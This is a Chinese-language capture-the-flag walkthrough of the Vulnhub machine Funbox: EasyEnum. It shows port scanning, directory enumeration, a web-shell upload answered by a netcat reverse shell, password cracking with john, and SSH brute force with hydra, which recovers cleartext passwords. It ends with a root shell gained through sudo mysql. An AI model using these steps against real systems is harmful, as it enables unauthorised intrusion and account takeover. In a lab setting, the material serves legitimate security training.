Vulnhub之Funbox 7 EasyEnum靶机详细解题过程
Funbox 7
作者: jason_huawen
靶机基本信息
名称:Funbox: EasyEnum
地址:https://www.vulnhub.com/entry/funbox-easyenum,565/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.59.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3a:6b:ac 1 60 PCS Systemtechnik GmbH
192.168.56.202 08:00:27:7f:88:17 1 60 PCS Systemtechnik GmbH
利用netdiscover工具识别目标主机的IP地址为192.168.56.202
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.202 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-21 04:20 EST
Nmap scan report for bogon (192.168.56.202)
Host is up (0.000081s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
| 256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_ 256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:7F:88:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
NMAP扫描结果表明目标主机有2个开放端口22(SSH)、80(HTTP)
Get Access
浏览器访问80端口,返回默认页面。
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ curl http://192.168.56.202/robots.txt
Allow: Enum_this_Box
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ gobuster dir --url http://192.168.56.202 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.202
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/21 04:23:36 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.202/javascript/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.202/secret/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.202/phpmyadmin/]
/server-status (Status: 403) [Size: 279]
Progress: 217158 / 220561 (98.46%)===============================================================
2022/11/21 04:23:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ curl http://192.168.56.202/secret/
根密码是用户密码的组合:harrysallygoatoraclelissy
不知道这个密码是啥意思(回头来看,这个信息是个迷魂阵,没啥用)
不过继续利用gobuster工具扫描目标站点文件时有收获:
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ gobuster dir --url http://192.168.56.202 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.202
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2022/11/21 04:25:06 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.202/javascript/]
/mini.php (Status: 200) [Size: 4443]
/robots.txt (Status: 200) [Size: 21]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.202/secret/]
/phpmyadmin (Status: 301) [Size: 321] [--> http://192.168.56.202/phpmyadmin/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1098299 / 1102805 (99.59%)===============================================================
2022/11/21 04:27:05 Finished
===============================================================
识别出来了/mini.php,我们可以通过该页面可以上传文件,将shell.php上传,在Kali Linux启动监听:
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.202] 50714
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
09:30:47 up 15 min, 0 users, load average: 0.20, 1.62, 1.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox7:/$ ls
ls
bin dev initrd.img lib64 mnt root snap sys var
boot etc initrd.img.old lost+found opt run srv tmp vmlinuz
cdrom home lib media proc sbin swap.img usr vmlinuz.old
成功拿到了目标主机反弹的shell
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... /etc/passwd:oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
脚本输出结果中显示oracle用户有密码的hash值. 将目标主机的passwd文件下载到Kali linux本地,编辑该文件,仅留下oracle行, 然后用john工具破解
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ cat passwd
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt passwd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hiphop (oracle)
1g 0:00:00:00 DONE (2022-11-21 04:46) 20.00g/s 7680p/s 7680c/s 7680C/s alyssa..michael1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
成功得到了oracle的密码, SSH登录oracle,不过似乎没啥用,无法提权到root,那继续看能否其他用户的shell?
目标主机一共有4个普通用户,至此已经oracle用户shell,而karla用户,作者提示不用在此费力, sally和harry用户家目录里都没有什么内容,因此接下来主要获得goat的shell, 在已知用户名的情况下,可以用hydra来破解密码,试一试
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ hydra -l goat -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.202
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-21 05:10:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.202:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 14344223 to do in 1358:22h, 16 active
[STATUS] 138.67 tries/min, 416 tries in 00:03h, 14343983 to do in 1724:03h, 16 active
[STATUS] 116.57 tries/min, 816 tries in 00:07h, 14343583 to do in 2050:46h, 16 active
[22][ssh] host: 192.168.56.202 login: goat password: thebest
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-21 05:18:04
成功拿到了goat用户的密码thebest,SSH登录该用户:
┌──(kali㉿kali)-[~/Vulnhub/Funbox7]
└─$ ssh goat@192.168.56.202
The authenticity of host '192.168.56.202 (192.168.56.202)' can't be established.
ED25519 key fingerprint is SHA256:O6BLR8bFSyZavzqwjyqsKadofhK4GNKalxHMVbZR+5Q.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.202' (ED25519) to the list of known hosts.
goat@192.168.56.202's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-117-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Nov 21 10:18:45 UTC 2022
System load: 0.16 Processes: 118
Usage of /: 67.6% of 4.66GB Users logged in: 0
Memory usage: 58% IP address for enp0s3: 192.168.56.202
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Sep 19 15:29:22 2020 from 192.168.178.143
goat@funbox7:~$ id
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)
goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User goat may run the following commands on funbox7:
(root) NOPASSWD: /usr/bin/mysql
goat@funbox7:~$ sudo mysql -e '\! /bin/sh'
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 64K
drwx------ 4 root root 4.0K Sep 19 2020 .
drwxr-xr-x 24 root root 4.0K Sep 19 2020 ..
-rw------- 1 root root 110 Sep 19 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 3 root root 4.0K Sep 19 2020 .gnupg
-rw-r--r-- 1 root root 5.8K Sep 19 2020 html.tar.gz
-rw------- 1 root root 0 Sep 19 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 2.9K Sep 19 2020 root.flag
-rwxr-xr-x 1 root root 31 Sep 19 2020 script.sh
-rw-r--r-- 1 root root 74 Sep 19 2020 .selected_editor
drwx------ 2 root root 4.0K Sep 18 2020 .ssh
-rw------- 1 root root 9.9K Sep 19 2020 .viminfo
-rw-r--r-- 1 root root 165 Sep 19 2020 .wget-hsts
# cat root.flag
█████▒ █ ██ ███▄ █ ▄▄▄▄ ▒█████ ▒██ ██▒
▓██ ▒ ██ ▓██▒ ██ ▀█ █ ▓█████▄ ▒██▒ ██▒▒▒ █ █ ▒░
▒████ ░ ▓██ ▒██░▓██ ▀█ ██▒▒██▒ ▄██▒██░ ██▒░░ █ ░
░▓█▒ ░ ▓▓█ ░██░▓██▒ ▐▌██▒▒██░█▀ ▒██ ██░ ░ █ █ ▒
░▒█░ ▒▒█████▓ ▒██░ ▓██░░▓█ ▀█▓░ ████▓▒░▒██▒ ▒██▒
▒ ░ ░▒▓▒ ▒ ▒ ░ ▒░ ▒ ▒ ░▒▓███▀▒░ ▒░▒░▒░ ▒▒ ░ ░▓ ░
░ ░░▒░ ░ ░ ░ ░░ ░ ▒░▒░▒ ░ ░ ▒ ▒░ ░░ ░▒ ░
░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░
░
▓█████ ▄▄▄ ██████ ▓██ ██▓▓█████ ███▄ █ █ ██ ███▄ ▄███▓
▓█ ▀ ▒████▄ ▒██ ▒ ▒██ ██▒▓█ ▀ ██ ▀█ █ ██ ▓██▒▓██▒▀█▀ ██▒
▒███ ▒██ ▀█▄ ░ ▓██▄ ▒██ ██░▒███ ▓██ ▀█ ██▒▓██ ▒██░▓██ ▓██░
▒▓█ ▄ ░██▄▄▄▄██ ▒ ██▒ ░ ▐██▓░▒▓█ ▄ ▓██▒ ▐▌██▒▓▓█ ░██░▒██ ▒██
░▒████▒ ▓█ ▓██▒▒██████▒▒ ░ ██▒▓░░▒████▒▒██░ ▓██░▒▒█████▓ ▒██▒ ░██▒
░░ ▒░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ██▒▒▒ ░░ ▒░ ░░ ▒░ ▒ ▒ ░▒▓▒ ▒ ▒ ░ ▒░ ░ ░
░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ▓██ ░▒░ ░ ░ ░░ ░░ ░ ▒░░░▒░ ░ ░ ░ ░ ░
░ ░ ▒ ░ ░ ░ ▒ ▒ ░░ ░ ░ ░ ░ ░░░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░
...solved !
Please, tweet this screenshot to @0815R2d2. Many thanks in advance.
#
登录以后,sudo -l ,发现可以通过mysql提权,查阅GTFOBINS网站的方法,成功拿到root shell!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
